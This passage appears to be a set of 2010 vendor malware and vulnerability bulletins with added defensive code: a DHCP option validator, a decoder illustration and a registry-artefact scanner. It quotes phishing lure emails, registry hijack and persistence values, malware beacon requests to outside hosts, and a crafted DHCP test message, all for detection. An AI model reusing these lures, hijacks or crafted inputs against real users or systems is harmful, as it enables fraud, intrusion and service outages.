Defense Center – Rogue AV (June 25, 2010)

SonicWALL UTM Research team found instances of a new Rogue AV downloader being spammed in the wild with the theme “Statement of Fees”. The e-mail contains the downloader file inside the zip attachment.

Below is a sample e-mail:

Email Campaign – Statement of Fees

Subject: Statement of fees 2010

Attachment: Statement_of_Fees_2010.DOC.zip (contains Statement_of_Fees_2010.DOC.exe)

Email Body:
————————
Please find attached a statement of fees as
requested, this will be posted today.
The accomodation is dealt with by another
section and I have passed your request on to them
today

Kind regards.
{email sender}
————————

The e-mail message looks like below:

    screenshot

The malicious executable inside the zip attachment disguises itself as a document by using the Microsoft Word icon and a double extension (.DOC.exe), so that on a system configured to hide known file extensions it appears as a .DOC file:

screenshot

Once the user runs the executable file, the Trojan will download and install the Rogue AV from the following URLs:

  • http://(REMOVED)fic.com/ms04/ad
  • http://(REMOVED)can.com/ms04/ad
  • http://(REMOVED)kol.com/ms04/ad

Before downloading the Rogue AV, the downloader first performs the following system activities:

  • To ensure that only one instance of the downloader runs at a time, it creates the mutex AAB647AB-4C1A-4cf0-9DE5-DD056FABF1F9
  • Adds the following values in the registry (affiliate and campaign identifiers used for pay-per-install tracking):
    Key: HKEY_CURRENT_USER\Printers\Connections
    Value: "subid" Data: "landing"
    Value: "affid" Data: "396"
  • Creates the file _favdata.dat in the Documents and Settings\All Users\Favorites folder with the following content:
    386
    landing
  • Checks the user's location against the following list and does not continue the installation if the user is in one of these countries:
    – Azerbaijan
    – Belarus
    – Czech Republic
    – Kazakhstan
    – Kyrgyzstan
    – Poland
    – Russia
    – Ukraine
    – Uzbekistan

Rogue AV Installation

    screenshot

    screenshot

    screenshot

    Files Added:

    • (Temp)\wscsvc32.exe – GAV: Conficker.gen (Worm)
    • (Temp)\autmgr32.exe – GAV: Tibs.JF (Trojan)
    • (Program Files)\Defense Center
    • (Program Files)\Defense Center\defcnt.exe – GAV: Conficker.gen (Worm)
    • (Program Files)\Defense Center\defext.dll – GAV: Conficker.gen (Worm)
    • (Program Files)\Defense Center\defhook.dll – GAV: Conficker.gen (Worm)
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\About.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Activate.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Buy.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Defense Center Support.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Defense Center.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Scan.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Settings.lnk
    • Documents and Settings\{User}\Start Menu\Programs\Defense Center\Update.lnk

    Registries Added:

      Auto Startup Entry
    • Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Value: Defense Center
      Data: "C:\Program Files\Defense Center\defcnt.exe" -noscan
      Disables Task Manager
    • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
      Value: DisableTaskMgr
      Data: dword:00000001
    • Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
      Value: DisableTaskMgr
      Data: dword:00000001
      Shell Spawning (with the .exe association below pointed at secfile, every program the user launches from the shell is started through autmgr32.exe, which receives the original program path in "%1")
    • Key: HKEY_CLASSES_ROOT\.exe\shell\open\command
      Value: @
      Data: autmgr32.exe /START "%1" %*
    • Key: HKEY_CLASSES_ROOT\secfile\shell\open\command
      Value: @
      Data: autmgr32.exe /START "%1" %*

    Registries Modified:

    • Key: HKEY_CLASSES_ROOT\.exe
      Value: @
      Original Data: "exefile"
      New Data: "secfile"

    When cleaning an infected machine, restore the .exe association to exefile before deleting autmgr32.exe; otherwise no executable, removal tools included, will start from the shell.

    After installation, the Rogue AV pretends to perform a full system scan for malware. At the end of the scan it displays fake results indicating that the system is infected:

      screenshot

    Once the user clicks the button to remove the threats, it will prompt for product activation which redirects the user to its payment portal.

      screenshot

      screenshot

    SonicWALL Gateway AntiVirus provides protection against these spammed Rogue AV variants via the following signatures:

    • GAV: TDSS.BHKV (Trojan) – (6,204 hits)
    • GAV: Tibs.JF (Trojan)
    • GAV: Tdss.BEEA_2 (Trojan)
    • GAV: Conficker.gen (Worm)

    screenshot

ISC DHCP Server Denial of Service (June 18, 2010)

The Dynamic Host Configuration Protocol (DHCP) is a computer networking protocol used by hosts (DHCP clients) to retrieve IP address assignments and other configuration information. DHCP uses a client-server architecture and utilizes UDP ports 67 and 68 for communication. The client sends a broadcast request for configuration information. The DHCP server receives the request and responds with configuration information from its configuration database. A typical DHCP transaction looks like:

[ Client ]----- DISCOVER ---->[ Server ]
[ Client ]<------ OFFER ------[ Server ]
[ Client ]----- REQUEST ----->[ Server ]
[ Client ]<------- ACK -------[ Server ]

All DHCP messages consist of a fixed-length header and some variable-length options. Each individual option record has the following format:

Offset  Size  Value
==============================
0000    1     Option code
0001    1     Option length (len)
0002    len   Option data

One of the option records is option 61, the Client Identifier.

A denial of service vulnerability exists in the ISC DHCP server, the most widely used open source DHCP implementation. The vulnerability is due to a design error in the handling of a crafted Client Identifier option record. A remote attacker can exploit it by sending a single crafted DHCP message to the target server; because DHCP requests are unauthenticated broadcasts, any host on a served network segment (or one reachable through a relay) can send such a message. Successful exploitation terminates the server process, leaving every client on the served networks without address assignment until it is restarted.

The CVE identifier for this vulnerability is CVE-2010-2156.
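The option-record format above is what a server has to walk before it can even look at option 61, and the checks it needs are few but easy to get wrong. The parser below is an added example written for this page, not ISC dhcpd code: it walks the option area of a constructed DHCP message, rejects records whose declared length runs past the buffer, and rejects an empty Client Identifier, which is the trigger the public CVE-2010-2156 entry describes (a zero-length client ID). The DISCOVER and the crafted message at the bottom are built by the example itself.

```python
"""Parser for the DHCP option area with the length checks a server needs.

Added example, not ISC dhcpd code.  The option area is what follows the
fixed 236-byte BOOTP header and the 4-byte magic cookie; each record is
<code><len><data>, except PAD (0) and END (255), which have no length byte.
The public CVE-2010-2156 entry describes the trigger as a zero-length
client identifier, so that case is rejected explicitly.  All packets below
are constructed for the example.
"""
from typing import Dict, List, Tuple

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_END = 0, 255
OPT_MSG_TYPE, OPT_CLIENT_ID = 53, 61


class MalformedOptions(ValueError):
    """An option record that does not fit the DHCP wire format."""


def parse_options(options: bytes) -> Dict[int, bytes]:
    """Walk the option area and return {option code: data}.

    Rejects a record whose declared length runs past the buffer, a record
    truncated before its length byte, a missing END marker, and a
    zero-length Client Identifier.
    """
    parsed: Dict[int, bytes] = {}
    i, n = 0, len(options)
    while i < n:
        code = options[i]
        if code == OPT_PAD:            # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:            # end of options; anything after is ignored
            break
        if i + 1 >= n:
            raise MalformedOptions(f"option {code} truncated before its length byte")
        length = options[i + 1]
        data = options[i + 2 : i + 2 + length]
        if len(data) != length:
            raise MalformedOptions(
                f"option {code} declares {length} bytes but only {len(data)} remain")
        if code == OPT_CLIENT_ID and length == 0:
            raise MalformedOptions("zero-length Client Identifier (option 61)")
        parsed[code] = data            # repeated codes (RFC 3396 splitting) not merged here
        i += 2 + length
    else:
        raise MalformedOptions("option area has no END (255) marker")
    return parsed


def parse_dhcp_message(pkt: bytes) -> Dict[int, bytes]:
    """Validate the fixed header length and magic cookie, then parse the options."""
    if len(pkt) < 240:
        raise MalformedOptions("message shorter than the fixed header plus magic cookie")
    if pkt[236:240] != MAGIC_COOKIE:
        raise MalformedOptions("missing DHCP magic cookie")
    return parse_options(pkt[240:])


def check_message(pkt: bytes) -> str:
    """Return "ok", or the reason a server should drop the message rather than act on it."""
    try:
        parse_dhcp_message(pkt)
    except MalformedOptions as exc:
        return str(exc)
    return "ok"


def build_message(records: List[Tuple[int, bytes]]) -> bytes:
    """Constructed test input: zeroed fixed header, cookie, the records, END."""
    body = b"".join(bytes([code, len(data)]) + data for code, data in records)
    return bytes(236) + MAGIC_COOKIE + body + bytes([OPT_END])


if __name__ == "__main__":
    # A normal DISCOVER: message type 1, client id = hardware type 1 plus a MAC address.
    discover = build_message([(OPT_MSG_TYPE, b"\x01"),
                              (OPT_CLIENT_ID, b"\x01" + bytes.fromhex("001122334455"))])
    # The crafted case: a Client Identifier record that is present but empty.
    crafted = build_message([(OPT_MSG_TYPE, b"\x01"), (OPT_CLIENT_ID, b"")])
    for name, pkt in (("discover", discover), ("crafted", crafted)):
        print(f"{name}: {check_message(pkt)}")
```

The point of check_message() is that a malformed record is a reason to drop the datagram and log it, never a reason for the daemon to exit; an IPS signature for this CVE is looking for exactly the second message the example builds.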

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 1079 ISC DHCP Server Client ID DoS

Malware targeting Facebook (June 18, 2010)

SonicWALL UTM Research team observed reports of new malware being spammed via Facebook private messages. The message pretends to contain a link to a photo album but eventually leads to a malware download.

Thousands of users were reportedly affected. Messages sent by the malware from an infected machine look like:

  • “You? I find it on google. http://www.onli(REMOVED)albums.org/Ephraim_Garlit”
  • “That yours? I find it on google. http://www.onli(REMOVED)albums.org/Rhoda_Octavia”

If the recipient user clicks the link, it leads them to a malicious site that looks like:

screenshot

Malware gets downloaded when user clicks on the photo album:

screenshot

If the user opens the downloaded executable, it performs the following activities:

  • It displays a dialog box with a fake error claiming the file type is not supported by the OS:

    screenshot

  • It drops three malicious executable files and executes them:
    • (TEMP)\1.exe
    • (TEMP)\2.exe
    • (TEMP)\3.exe

Process 1.exe

This process scans for any open Internet Explorer or Firefox instances and terminates them to ensure that code injected by process 3.exe gets executed during next browsing session.

Process 2.exe

This process performs the following file and registry modifications:

  • Drops a copy of itself at (Application Data)\dfw.exe [Detected as GAV: Kbot.ANJ (Trojan)]
  • Adds the registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dfw.exe = "(Application Data)\dfw.exe" so that it runs at every system start.
  • Memory dump showing the Facebook-related strings present while this process runs:

    screenshot

Process 3.exe

  • Scans for security-related processes (Kaspersky, F-Secure, Comodo) and terminates them when found.
  • Attempts to disable System Restore.
  • Drops a malicious DLL at (Application Data)\Windows Server\ckiobo.dll [Detected as GAV: Small.ACMO (Trojan)]
  • Adds the registry values
    • HKLM\SYSTEM\ControlSet001\Control\Session Manager\AppCertDlls\AppSecDll: "(Application Data)\Windows Server\ckiobo.dll"
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls\AppSecDll: "(Application Data)\Windows Server\ckiobo.dll"
    Windows loads every DLL listed under AppCertDlls into each process that calls one of the CreateProcess family of APIs (CreateProcess, CreateProcessAsUser, WinExec and so on), which is how the DLL ends up inside the user's processes without any change to the browser itself. This key is normally empty, so any entry under it is worth investigating.
  • Injects the malicious DLL code into memory, where it executes when the user connects to Facebook via IE or Firefox.
  • Deletes itself.

The following HTTP requests were initiated by the malware once the user logged on to Facebook from an infected machine:

  • GET /message.php?subid=284&version=_nn2&id=(REMOVED)XAOBd00TglD6O HTTP/1.1 Host: smartcontrol.info
  • GET /ab/setup.php?act=filters&id=(REMOVED)Qf7E4s2t&ver=2 HTTP/1.1 Host: spmfb3309.com
  • POST /ab/setup.php?act=data HTTP/1.1 Host: spmfb3309.com

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Kbot.ANJ (Trojan) signature.

MS hcp-URL Cross Site Scripting (June 10, 2010)

Just one day after the busy Microsoft Patch Day in June, with ten security bulletins fixing 34 vulnerabilities, a new cross-site scripting (XSS) issue was publicly disclosed by Tavis Ormandy. It can potentially lead to shellcode execution within the logged-in user's security context.

Microsoft Windows Help and Support Center is the default application for accessing online documentation for Microsoft Windows. Microsoft supports opening help documents directly via URLs by installing a protocol handler for the "hcp" scheme; a typical example is given in the Windows XP Command Line Reference, shown below. Please refer to http://technet.microsoft.com/en-us/library/bb490918.aspx for details.

helpctr [/url [URL]] [/mode [URL]] [/hidden] [/fromstarthelp]

On Windows XP SP2 and later the Help and Support Center application is installed by default as helpctr.exe in c:\windows\pchealth\helpctr\binaries. When a web browser follows an hcp:// URL, the protocol handler launches helpctr.exe with that URL on its command line together with the "/fromhcp" switch. This switch puts the Help Center into a restricted mode that only permits a whitelisted set of help documents and parameters.

The application uses the function MPC::HTML::UrlUnescapeW() to normalise the URL; it in turn calls MPC::HexToNum() to translate URL escape sequences back into their original characters. However, the return code of MPC::HexToNum() is not checked, so an invalid escape sequence produces an unexpected character that is appended to the resulting string anyway. This error allows an attacker to evade the whitelist check described above. On top of that, the attacker can use one of the web-accessible help documents that call the vulnerable function to execute encoded script and, from there, shellcode. An example of such a document is:

C:\WINDOWS\pchealth\helpctr\System\sysinfo\sysinfomain.htm
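The unchecked return code is the whole bug, and it is easier to see in a small decoder than in prose. The following is an added illustration, not the Help and Support Center code: it assumes that MPC::HexToNum() returns -1 for a character that is not a hex digit and that the caller combines the two digit values into a 16-bit character without checking for that -1, and shows what such a decoder produces for malformed escapes next to a decoder that rejects them.

```python
"""Percent-decoding with an unchecked hex conversion beside a checked one.

Added illustration, not the Help and Support Center code.  It assumes that
MPC::HexToNum() returns -1 for a character that is not a hex digit and that
the caller combines the two digit values into a 16-bit character without
looking at that return code; only that pattern is modelled here.
"""
from typing import Optional


def hex_to_num(ch: str) -> int:
    """Value of one hex digit, or -1 for anything else (assumed contract)."""
    if "0" <= ch <= "9":
        return ord(ch) - ord("0")
    if "a" <= ch.lower() <= "f":
        return ord(ch.lower()) - ord("a") + 10
    return -1


def unescape_unchecked(url: str) -> str:
    """Decode %XX without checking hex_to_num()'s result.

    A bad digit contributes -1, so "%4G" becomes 4*16 - 1 = 63 = '?' and
    "%GG" wraps to U+FFEF: malformed input is silently turned into real
    characters that no whitelist entry anticipated.
    """
    out, i = [], 0
    while i < len(url):
        if url[i] == "%" and i + 2 < len(url):
            value = hex_to_num(url[i + 1]) * 16 + hex_to_num(url[i + 2])
            out.append(chr(value & 0xFFFF))   # 16-bit wchar_t truncation
            i += 3
        else:
            out.append(url[i])
            i += 1
    return "".join(out)


def unescape_checked(url: str) -> Optional[str]:
    """Same decoder, but a malformed or truncated escape rejects the whole URL."""
    out, i = [], 0
    while i < len(url):
        if url[i] == "%":
            if i + 2 >= len(url):
                return None
            hi, lo = hex_to_num(url[i + 1]), hex_to_num(url[i + 2])
            if hi < 0 or lo < 0:
                return None
            out.append(chr(hi * 16 + lo))
            i += 3
        else:
            out.append(url[i])
            i += 1
    return "".join(out)


if __name__ == "__main__":
    for sample in ("sysinfo%2Fsysinfomain.htm", "%4G", "%GG", "%4"):
        print(repr(sample), "->", repr(unescape_unchecked(sample)),
              "|", repr(unescape_checked(sample)))
```

Whatever validation runs after decoding only sees the decoder's output; once the decoder manufactures characters from garbage, the validator and the component that eventually consumes the string can be looking at two different things. Rejecting the input, as unescape_checked() does, removes that gap.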

The SonicWALL UTM team has researched this vulnerability and created IPS signature to detect/prevent attacks exploiting this issue.

  • 4177 MS hcp-URL sysinfomain.htm XSS

At the time of writing, no Common Vulnerabilities and Exposures (CVE) identifier had been assigned to this vulnerability.

Adobe Flash Player Zero Day exploit (Jun 8, 2010)

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2010-1297) in Adobe Flash Player, Reader and Acrobat affecting Windows, Mac OS X, Linux and Solaris. Successful exploit attempts typically crash the application and could allow the attacker to gain control of the victim machine. Affected software versions include Adobe Flash Player 10.0.45.2 and earlier, and Adobe Reader and Acrobat 9.3.2 and earlier. Adobe issued a security advisory on June 4, 2010 warning users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability which is a specially crafted PDF file containing a malicious packed Shockwave Flash (SWF) file and a malicious encoded JavaScript. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

Decoded version of JavaScript extracted from the PDF file shows presence of shellcode that drops a malicious executable file onto the target machine:

screenshot

The embedded malicious SWF file looks like this when executed:

screenshot

The malicious PDF file when opened performs the following:

  • Encoded JavaScript uses heap spraying technique via large Unicode strings to effectively place the embedded shellcode into the memory.
  • Malicious SWF file gets executed which triggers the vulnerability and causes the Adobe application to crash.
  • The application crash further leads to the execution of the shellcode that already resides within the memory.
  • The shellcode is responsible for extracting and dropping a malicious executable file from the PDF onto the victim machine.
    • c:\-.exe [Detected as: GAV: DownLdr.AC (Trojan)]

The dropped executable is a backdoor Trojan that performs the following activities on the victim machine:

  • Sends the request GET /ddradmin/ddrh.ashx?guid=00000000-0000-0000-0000-000000000000 to a predetermined IP address [which appeared to be down at the time of writing this alert]
  • Drops the following files:
    • (Windows System)\dllcache\qmgr.dll
    • (Windows System)\qmgr.dll
    • (Windows System)\es.ini
    • (Windows System)\kernel64.dll
    • (Windows)\EventSystem.dll

    The dropped DLL files are detected as GAV: Agent.AAQJ (Trojan). Note that qmgr.dll is the legitimate Background Intelligent Transfer Service (BITS) DLL; overwriting both the System32 copy and the dllcache copy prevents Windows File Protection from restoring the original, so the replacement survives until it is removed by hand.

Adobe announced today that a security patch for Flash Player will be released on June 10, 2010, while the patch for Adobe Reader and Acrobat will be available on June 29, 2010.

SonicWALL UTM appliance provides protection against this threat via GAV: Pdfka.CKQ (Exploit) and IPS: Adobe PDF File with Flash signatures.

Desktop Security 2010 – Rogue AV (May 6, 2010)

SonicWALL UTM Research team observed reports of a new Rogue AV downloader being spammed in the wild since yesterday via Invoice e-mail spam and Ecard e-mail spam campaigns. The Downloader Trojan arrives as an e-mail attachment or gets downloaded via a URL in the e-mail.

Campaign #1 – Transaction Invoice e-mail spam

Subject: Your transaction has been processed

Attachment: invoice.zip (contains invoice.exe)

Email Body:
————————
Your transaction has been processed by WorldPay, on behalf of Amazon Inc.
The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
And will inform you about delivery.
Sincerely,
Amazon Team
————————

The e-mail message looks like below:

screenshot

Campaign #2 – Ecard e-mail spam

Subject: You Have Received a Greeting Card

Attachment: none

Email Body:
————————
Good day.
You have received an eCard

To pick up your eCard, click on the following link (or copy & paste it
into your web browser):

htt://groups.google.com/group/{REMOVED}/setup.zip

Your card will be available for pick-up beginning for the next 30
days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!
————————

The e-mail message looks like below:

screenshot

When the user clicks the URL, it will lead to this Google Groups page pointing to the Rogue AV downloader.

screenshot

Installation
Installs itself as the following files (file names may differ between infections; every copy is 151,040 bytes):

  • Program Files\Common Files\Microsoft Shared\DW\ApplicationReporting.exe – (151,040 bytes)
  • Program Files\Common Files\Microsoft Shared\DW\1033\WindowsTMOperating.exe – (151,040 bytes)
  • Program Files\Common Files\Microsoft Shared\DW\1036\ErrorMicrosoft.exe – (151,040 bytes)
  • Program Files\Windows NT\Accessories\WindowsMicrosoft.exe – (151,040 bytes)
  • Program Files\Online Services\Providers\Refer.exe – (151,040 bytes)

It attempts to connect to securehttpss.com and downloads the Desktop Security 2010 installer via the following HTTP request:

  • GET Request: GET /getfile.php?r={10 random characters}&p={REMOVED}=

Installs the Desktop Security 2010 Rogue AV as seen below:

screenshot

screenshot

Registry Changes

    Added Registry

  • Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value: TCPViewSysinternals
    Data: "C:\Documents and Settings\(UserName)\Desktop\invoice.exe"

    Value: SAPI5WindowsTM
    Data: "c:\program files\common files\microsoft shared\speech\1033\windowstmoperating.exe"

  • Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
    Value: DWIntl20Application
    Data: "Program Files\Common Files\Microsoft Shared\DW\1036\ErrorMicrosoft.exe"

    Value: wordpadWindows
    Data: "Program Files\Windows NT\Accessories\WindowsMicrosoft.exe"

    Value: NotificationsSubscriber
    Data: "Program Files\Common Files\Microsoft Shared\DW\ApplicationReporting.exe"

    Value: moreInternet
    Data: "Program Files\Online Services\Providers\Refer.exe"

  • Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value: Desktop Security 2010
    Data: "Application Data\Desktop Security 2010\Desktop Security 2010.exe" /STARTUP

    Value: SecurityCenter
    Data: "Application Data\Desktop Security 2010\securitycenter.exe"

  • Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Desktop Security 2010
    Value: DisplayName
    Data: "Desktop Security 2010"

    Value: UninstallString
    Data: "Application Data\Desktop Security 2010\securityhelper.exe" /UNINSTALL

    Value: DisplayIcon
    Data: "Application Data\Desktop Security 2010\securityhelper.exe",1

Remote Server Connection:

    This Rogue AV tries to connect to remote server and reports back system information and installation logs. Shown below is sample data sent to the server:

screenshot

SonicWALL Gateway AntiVirus provides protection against these spammed Rogue AV variants via the following signatures:

  • GAV: FakeAlert.GEN_6 (Trojan) – (about 3 million hits recorded so far)
  • GAV: FakeAV.DH (Trojan)

screenshot

Protection Center – Rogue AV (June 4, 2010)

SonicWALL UTM Research team observed reports of a new Rogue AV downloader being spammed in the wild using a variety of e-mail themes. The e-mail carries the downloader inside a zip attachment. Below is a sample e-mail for each of the spam themes:

Campaign #1 – Online Order e-mail spam

Subject: Thank you for setting the oder No. [6-digits]

Attachment: label.zip (contains label.exe)

Email Body:
————————
Thank you for ordering at our online store.
Your order: Sony VAIO A1133651A, was send at your address.
The tracking number of your postal parcel is indicated in the document
attached to this letter
Please print out the postal label for receiving the parcel.

Internet Store.
————————

The e-mail message looks like below:

    screenshot

Campaign #2 – Outlook Setup Notification email spam

Subject: Outlook Setup Notification

Attachment: outlookupdate.zip (contains outlookupdate.exe)

Email Body:
————————
You have (8) messages from Microsoft Outlook.

Please re-configure your Microsoft Outlook again.

Download attached setup file and install.
————————

The e-mail message looks like below:

    screenshot

Campaign #3 – Twitter Password e-mail spam

Subject: Reset your Twitter password

Attachment: password.zip (contains password.exe)

Email Body:
————————
Hey there.

Because of the measures taken to provide safety to our
clients, your password has been changed.
You can find your new password in attached document.

Yours,
Twitter=
————————

The e-mail message looks like below:

    screenshot

Rogue AV Installation

Once the user opens the zip attachment and executes the malicious file, the Trojan downloads and installs the Rogue AV from the following URLs:

  • http://(REMOVED).org/ms03/ad
  • http://(REMOVED).com/ms03/ad
  • http://(REMOVED).com/ms03/ad

    screenshot

    screenshot

Files Added:

  • Documents and Settings\{User}\Local Settings\Temp\wscsvc32.exe – GAV: Conficker.gen (Worm)
  • Documents and Settings\{User}\Local Settings\Temp\mscdexnt.exe – GAV: Conficker.gen (Worm)
  • Program Files\Protection Center
  • Program Files\Protection Center\cntprot.exe – GAV: Conficker.gen (Worm)
  • Program Files\Protection Center\cntext.dll – GAV: Conficker.gen (Worm)
  • Program Files\Protection Center\cnthook.dll – GAV: Conficker.gen (Worm)
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\About.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Activate.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Buy.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Protection Center Support.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Protection Center.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Scan.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Settings.lnk
  • Documents and Settings\{User}\Start Menu\Programs\Protection Center\Update.lnk

Registries Added:

    Auto Startup Entry
  • Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value: Protection Center
    Data: "C:\Program Files\Protection Center\cntprot.exe" -noscan
    Disabling Task Manager
  • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    Value: DisableTaskMgr
    Data: dword:00000001
  • Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    Value: DisableTaskMgr
    Data: dword:00000001
    Shell Spawning (once .exe resolves to secfile, every executable launched from the shell is routed through mscdexnt.exe)
  • Key: HKEY_CLASSES_ROOT\.exe\shell\open\command
    Value: @
    Data: mscdexnt.exe /START "%1" %*
  • Key: HKEY_CLASSES_ROOT\secfile\shell\open\command
    Value: @
    Data: mscdexnt.exe /START "%1" %*

Registries Modified:

  • Key: HKEY_CLASSES_ROOT\.exe
    Value: @
    Original Data: "exefile"
    New Data: "secfile"
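The registry artefacts in this entry, in the Defense Center entry above (the .exe association redirected to secfile, the hijacked shell\open\command, DisableTaskMgr), in the Facebook malware entry (the AppCertDlls value) and in the Desktop Security 2010 entry (Run and RunServices values pointing into the user's profile) are the kind of thing an incident responder checks on a suspect machine with a few `reg export` commands. The scanner below is an added example, not SonicWALL code: it parses the .reg export format and applies one rule per artefact class. The export text at the bottom is constructed from the indicators on this page, with a clean ctfmon.exe Run value included as a control.

```python
r"""Scan a Windows .reg export for the persistence and hijack artefacts this
bulletin lists: the .exe association redirected to a new class, the
shell\open\command of that class routed through a dropped binary,
DisableTaskMgr, AppCertDlls entries, and Run/RunServices values pointing
into user-writable folders.

Added example, not SonicWALL code.  SAMPLE_EXPORT is constructed from the
indicators on this page; a real export comes from commands such as
"reg export HKCR\.exe hkcr_exe.reg" run on the suspect machine.
"""
import re
from typing import List, Tuple

Finding = Tuple[str, str, str, str]          # (rule, key, value name, data)
_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runservices")
USER_WRITABLE = ("\\temp\\", "\\application data\\", "\\desktop\\", "\\local settings\\")


def _unescape(s: str) -> str:
    """Undo .reg string escaping (backslash-backslash and backslash-quote)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value name, data) triples; "@" is the default value and
    dword/hex data is kept in its textual form."""
    triples, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_RE.match(line)
        if not m or key is None:
            continue
        name = "@" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        data = m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = _unescape(data[1:-1])
        triples.append((key, name, data))
    return triples


def scan_reg_export(text: str) -> List[Finding]:
    """Apply the rules and return every matching value in file order."""
    triples = parse_reg_export(text)
    exe_class = "exefile"                    # what .exe normally resolves to
    for key, name, data in triples:
        if key.lower() == "hkey_classes_root\\.exe" and name == "@":
            exe_class = data.lower()
    handler_key = f"hkey_classes_root\\{exe_class}\\shell\\open\\command"

    findings: List[Finding] = []
    for key, name, data in triples:
        k, d = key.lower(), data.lower()
        if k == "hkey_classes_root\\.exe" and name == "@" and d != "exefile":
            findings.append(("exe-association-hijack", key, name, data))
        elif k == handler_key and name == "@" and d != '"%1" %*':
            findings.append(("exe-handler-hijack", key, name, data))
        elif (k.endswith("\\policies\\system") and name.lower() == "disabletaskmgr"
              and d == "dword:00000001"):
            findings.append(("taskmgr-disabled", key, name, data))
        elif "\\session manager\\appcertdlls" in k:      # key is normally empty
            findings.append(("appcertdlls-entry", key, name, data))
        elif k.endswith(RUN_KEYS) and any(p in d for p in USER_WRITABLE):
            findings.append(("run-key-user-writable-path", key, name, data))
    return findings


SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.exe]
@="secfile"

[HKEY_CLASSES_ROOT\secfile\shell\open\command]
@="mscdexnt.exe /START \"%1\" %*"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"AppSecDll"="C:\\Documents and Settings\\user\\Application Data\\Windows Server\\ckiobo.dll"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Protection Center"="\"C:\\Program Files\\Protection Center\\cntprot.exe\" -noscan"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"dfw.exe"="\"C:\\Documents and Settings\\user\\Application Data\\dfw.exe\""
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

if __name__ == "__main__":
    for rule, key, name, data in scan_reg_export(SAMPLE_EXPORT):
        print(f"{rule:28} {key}\\{name} = {data}")
```

The Protection Center Run value itself is deliberately not flagged: it lives under Program Files, so the rule set reports the things that are wrong on their own (the hijacked association and handler, the disabled Task Manager, the AppCertDlls entry, the profile-resident Run value) rather than every autostart on the box.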

After installation, the Rogue AV runs and pretends to scan the whole system for malware. At the end of the scan it displays fake results indicating that the system is infected. Shown below is a screenshot of the fake detection result.

    screenshot

Once the user clicks the button to remove the threats, it will prompt for product activation which redirects the user to its payment portal.

    screenshot

    screenshot

SonicWALL Gateway AntiVirus provides protection against these spammed Rogue AV variants via following signatures:

  • GAV: Suspicious#polycrypt.12 (Worm) – (5,996,197 hits)
  • GAV: Suspicious#fakeav_4 (Trojan) – (339,789 hits)
  • GAV: FakeAV.DN (Trojan)
  • GAV: Conficker.gen (Worm)

screenshot

screenshot

OPIE Off-by-one Stack Buffer Overflow (June 3, 2010)

“One-time Passwords In Everything” (OPIE) is a mature Unix login and password package, installed on both the server and the client, that makes untrusted networks safer against password-sniffing packet analysers. It defeats replay attacks because the same password is never used twice once OPIE is installed. OPIE ships with DragonFly BSD, FreeBSD and OpenSUSE, and is sometimes used by FTP servers to secure FTP sessions.

